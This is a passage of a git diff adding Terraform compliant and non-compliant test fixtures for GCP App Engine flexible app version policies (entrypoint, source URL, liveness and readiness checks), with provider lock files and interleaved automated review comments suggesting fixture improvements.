b/inputs/gcp/app_engine/app_engine_flexible_app_version/automatic_scaling/cpu_utilization/target_utilization/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf new file mode 100644 index 000000000..87356936f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/c.tf 
@@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/hardhat-bucket/hello-world.zip" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf new file mode 100644 index 000000000..8c0bae7de --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/nc.tf 
@@ -0,0 +1,37 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "invalid.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + resources { + cpu = 1 + memory_gb = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json new file mode 100644 index 000000000..4258a1cf9 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/deployment/zip/source_url/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf new file mode 100644 index 000000000..54888810b --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/c.tf 
@@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf new file mode 100644 index 000000000..c094514b3 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1-bad" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "sudo node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json new file mode 100644 index 000000000..fe7b377c1 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/entrypoint/shell/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl new file mode 100644 index 000000000..316309c9a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.17.0" + hashes = [ + "h1:VPHRMsm3eQrxzk1b7eHuSG9sG7315ZaGPshFjqzZ5No=", + "zh:103778d776fb994a6b24d70fa095c23a1672361f2a05d882b227b02507b402fc", + "zh:34bcd6cce3081a21983ccfad5cbf2cbf69ff298c65c6570edb4ec7d38a8183f5", + "zh:5f8fd0e8e40068b597b28c0bc08372c9228aad77746068101c72acf4bb902937", + "zh:6b25cee7dec78470feb987438aedb1f4354c696f6548edee7775621e8df24fa9", + "zh:6b5bd97884b51b86fa6a9f1905c0ebf695539e905122052896e8b05122416ff4", + "zh:86e634c5825d8bd32592ae6b74f15e1db5d9b61c85d1a2e529d1696effb76d54", + "zh:c3190609f6f638f4efd7359a5638eeff81d41a38a00861f7df870b5c8f4c11cb", + "zh:d42d854642b4d3b010f232d848197945f90af60e7f9883ac96d7caae9c9d2474", + "zh:da9929be5d3873ad317e488e7ada08d5b95b5461b34d91cef76314317bdc0d49", + "zh:ed2763c21b2f3c1eb7b4b92f6502069a24078345e19c88f91d9e3a46a17147f8", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + "zh:fbca63b82bbdef6fd329d2c8356b3f39f8c785ad93fd0596cfff676dbaef23ac", + ] +} 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf new file mode 100644 index 000000000..805be137a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/c.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + failure_threshold = 4 + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf new file mode 100644 index 000000000..7a155b865 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/nc.tf 
@@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + failure_threshold = 0 + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json new file mode 100644 index 000000000..842ca7d14 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/failure_threshold/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/c.tf 
@@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf new file mode 100644 index 000000000..9f0a88039 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/nc.tf @@ -0,0 +1,30 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "unauthorized-service" + runtime = "python27" + + entrypoint { + shell = "python app.py" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + manual_scaling { + instances = 1 + } + + liveness_check { + path = "/unapproved-endpoint" + } + + readiness_check { + path = "/not-monitored" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json new file mode 100644 index 000000000..03f4a3ee4 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/path/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/.terraform.lock.hcl @@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} 
diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf new file mode 100644 index 000000000..af3c02445 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/c.tf @@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "4s" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf new file mode 100644 index 000000000..f69c93790 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/nc.tf 
@@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + timeout = "30s" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json new file mode 100644 index 000000000..b72078a3d Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/liveness_check/timeout/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl new file mode 100644 index 000000000..316309c9a --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/.terraform.lock.hcl 
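Review bot: The only difference between this `nc.tf` and the compliant fixture is `timeout = "30s"` versus `"4s"`, so the boundary the liveness-timeout policy enforces is implicit in two magic numbers; add a comment in `nc.tf` naming the maximum the policy accepts, and ideally a fixture at that boundary value, otherwise a later edit to either number silently changes what the test proves. A fixture that omits `timeout` entirely would also pin down whether the provider default is treated as compliant rather than as a missing attribute.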
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.17.0" + hashes = [ + "h1:VPHRMsm3eQrxzk1b7eHuSG9sG7315ZaGPshFjqzZ5No=", + "zh:103778d776fb994a6b24d70fa095c23a1672361f2a05d882b227b02507b402fc", + "zh:34bcd6cce3081a21983ccfad5cbf2cbf69ff298c65c6570edb4ec7d38a8183f5", + "zh:5f8fd0e8e40068b597b28c0bc08372c9228aad77746068101c72acf4bb902937", + "zh:6b25cee7dec78470feb987438aedb1f4354c696f6548edee7775621e8df24fa9", + "zh:6b5bd97884b51b86fa6a9f1905c0ebf695539e905122052896e8b05122416ff4", + "zh:86e634c5825d8bd32592ae6b74f15e1db5d9b61c85d1a2e529d1696effb76d54", + "zh:c3190609f6f638f4efd7359a5638eeff81d41a38a00861f7df870b5c8f4c11cb", + "zh:d42d854642b4d3b010f232d848197945f90af60e7f9883ac96d7caae9c9d2474", + "zh:da9929be5d3873ad317e488e7ada08d5b95b5461b34d91cef76314317bdc0d49", + "zh:ed2763c21b2f3c1eb7b4b92f6502069a24078345e19c88f91d9e3a46a17147f8", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + "zh:fbca63b82bbdef6fd329d2c8356b3f39f8c785ad93fd0596cfff676dbaef23ac", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf new file mode 100644 index 000000000..805b750f7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/c.tf 
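Review bot: This lock file pins `hashicorp/google` at `version = "7.17.0"` while every other `.terraform.lock.hcl` in the change records `7.15.0`; regenerate it against the same version so the `plan.json` schema is identical across fixtures and a provider upgrade becomes one deliberate change instead of per-directory drift.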
@@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + failure_threshold = 4 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf new file mode 100644 index 000000000..e98547ba7 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/nc.tf 
@@ -0,0 +1,33 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + failure_threshold = 0 + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json new file mode 100644 index 000000000..f3ef2323c Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/failure_threshold/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/.terraform.lock.hcl 
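Review bot: `failure_threshold = 0` in `nc.tf` exercises only the lower bound of `readiness_check.failure_threshold`, and it is worth confirming the API accepts 0 at all, since a fixture that cannot be applied does not represent a real misconfiguration. If the policy is meant to reject checks that are too lax, add a fixture with a large threshold as the second negative case, and state the accepted range in the policy so the `4` in `c.tf` is reviewable against it rather than taken on faith.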
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf new file mode 100644 index 000000000..ce0d8da46 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/c.tf 
@@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com" + } + } + + automatic_scaling { + cpu_utilization { + target_utilization = 0.5 + } + } + + liveness_check { + path = "/" + } + + readiness_check { + path = "/" + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf new file mode 100644 index 000000000..22b67cca0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_flexible_app_version/readiness_check/path/nc.tf @@ -0,0 +1,32 @@ +resource "google_app_engine_flexible_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs" + + entrypoint { + 